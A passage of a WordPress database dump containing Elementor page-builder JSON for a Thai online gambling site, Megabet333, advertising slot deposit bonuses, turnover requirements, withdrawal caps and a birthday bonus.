\\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong> \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e27\\u0e31\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 (\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(478,81,'_elementor_edit_mode','builder'),(479,81,'_elementor_template_type','wp-page'),(480,81,'_elementor_version','3.32.5'),(481,81,'_elementor_pro_version','3.32.3'),(482,81,'_wp_page_template','default'),(483,81,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(484,81,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" 